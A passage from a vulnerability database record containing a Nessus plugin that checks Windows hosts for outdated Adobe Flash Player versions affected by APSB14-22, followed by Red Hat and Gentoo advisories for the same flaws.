script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\n \"CVE-2014-0558\",\n \"CVE-2014-0564\",\n \"CVE-2014-0569\",\n \"CVE-2014-8439\"\n );\n script_bugtraq_id(\n 70437,\n 70441,\n 70442,\n 71289\n );\n\n script_name(english:\"Flash Player <= 15.0.0.167 Multiple Vulnerabilities (APSB14-22)\");\n script_summary(english:\"Checks the version of Flash Player.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of Adobe Flash Player\ninstalled on the remote Windows host is equal or prior to 15.0.0.167.\nIt is, therefore, affected by the following vulnerabilities :\n\n - Multiple memory corruption issues due to improperly\n sanitized user-supplied input allow arbitrary code\n execution. (CVE-2014-0564, CVE-2014-0558)\n\n - An integer overflow issue due to improperly sanitized\n user-supplied input that allows arbitrary code\n execution. (CVE-2014-0569)\n\n - An arbitrary code execution vulnerability due to the\n handling of a dereferenced memory pointer.\n (CVE-2014-8439)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-22.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 15.0.0.189 or later.\n\nAlternatively, Adobe has made version 13.0.0.250 available for those\ninstallations that cannot be upgraded to 15.x.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-8439\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player casi32 Integer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Flash_Player/installed\");\n\n# Identify vulnerable versions.\ninfo = \"\";\n\n# we're checking for versions less than *or equal to* the cutoff!\nforeach variant (make_list(\"Plugin\", \"ActiveX\", \"Chrome\", \"Chrome_Pepper\"))\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n if (!isnull(vers) && !isnull(files))\n {\n foreach key (keys(vers))\n {\n ver = vers[key];\n\n if (ver)\n {\n iver = split(ver, sep:'.', keep:FALSE);\n for (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\n\n if (\n (\n # Chrome Flash <= 15.0.0.152\n variant == \"Chrome_Pepper\" &&\n (\n (iver[0] < 15) ||\n (iver[0] == 15 && iver[1] == 0 && iver[2] == 0 && iver[3] <= 152)\n )\n ) ||\n (variant != \"Chrome_Pepper\" &&\n (\n (\n # < 13\n (\n iver[0] < 13 ||\n # 13.0.0.x <= 13.0.0.244\n (\n iver[0] == 13 &&\n (\n iver[1] == 0 &&\n (\n iver[2] == 0 &&\n (\n iver[3] <= 244\n )\n )\n )\n )\n ) ||\n # 14.0.0.x <= 15.0.0.167\n (\n iver[0] == 14 ||\n (\n iver[0] == 15 &&\n (\n iver[1] == 0 &&\n (\n iver[2] == 0 &&\n (\n iver[3] <= 167\n )\n )\n )\n )\n )\n )\n )\n )\n )\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == \"Plugin\")\n {\n info += '\\n Product : Browser Plugin (for Firefox / Netscape / Opera)';\n fix = \"15.0.0.189 / 13.0.0.250\";\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for Internet Explorer)';\n fix = \"15.0.0.189 / 13.0.0.250\";\n }\n else if (\"Chrome\" >< variant)\n {\n info += '\\n Product : Browser Plugin (for Google Chrome)';\n }\n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver;\n if (variant == \"Chrome_Pepper\")\n info += '\\n Fixed version : 15.0.0.189 (Chrome PepperFlash)';\n else\n info += '\\n Fixed version : '+fix;\n info += '\\n';\n }\n }\n }\n }\n}\n\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0) security_hole(port:port, extra:info);\n else security_hole(port);\n}\nelse\n{\n if (thorough_tests)\n exit(0, 'No vulnerable versions of Adobe Flash Player were found.');\n else\n exit(1, 'Google Chrome\\'s built-in Flash Player may not have been detected because the \\'Perform thorough tests\\' setting was not enabled.');\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:46:29", "bulletinFamily": "unix", "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player. These\nvulnerabilities are detailed in the Adobe Security Bulletin APSB14-22,\nlisted in the References section.\n\nMultiple flaws were found in the way flash-plugin displayed certain SWF\ncontent. An attacker could use these flaws to create a specially crafted\nSWF file that would cause flash-plugin to crash or, potentially, execute\narbitrary code when the victim loaded a page containing the malicious SWF\ncontent. (CVE-2014-0558, CVE-2014-0564, CVE-2014-0569)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 11.2.202.411.\n", "modified": "2018-06-07T09:04:20", "published": "2014-10-15T04:00:00", "id": "RHSA-2014:1648", "href": "https://access.redhat.com/errata/RHSA-2014:1648", "type": "redhat", "title": "(RHSA-2014:1648) Critical: flash-plugin security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:30", "bulletinFamily": "unix", "description": "### Background\n\nThe Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process or bypass security restrictions. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Adobe Flash Player users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-plugins/adobe-flash-11.2.202.418\"", "modified": "2014-11-21T00:00:00", "published": "2014-11-21T00:00:00", "id": "GLSA-201411-06", "href": "https://security.gentoo.org/glsa/201411-06", "type": "gentoo", "title": "Adobe Flash Player: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}